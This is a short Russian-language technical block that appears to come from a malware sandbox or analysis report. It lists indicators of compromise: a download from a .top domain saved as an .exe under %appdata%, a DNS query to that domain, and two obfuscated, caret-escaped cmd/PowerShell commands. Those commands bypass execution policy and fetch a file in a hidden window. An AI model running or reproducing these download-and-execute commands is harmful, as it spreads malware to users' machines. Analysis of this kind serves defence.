Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^E^r^shEL^L.^eXE ^-EX^E^cU^T^I^OnP^Ol^i^CY ^B^y^p^a^sS ^-^n^oPRofil^E -^WI^N^DOWS^T^YLE hi^dde^N ^(^new-o^BJeCt SysT^Em^.NEt^.WeBCLi^e^n^T).d^o^Wnl^o^ADFi^lE(^'http:/...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "POw^E^r^shEL^L.^eXE ^-EX^E^cU^T^I^OnP^Ol^i^CY ^B^y^p^a^sS ^-^n^oPRofil^E -^WI^N^DOWS^T^YLE hi^dde^N ^(^new-o^BJeCt SysT^Em^.NEt^.WeBCLi^e^n^T).d^o^Wnl^o^ADFi^lE(^'http:/...' (со скрытым окном)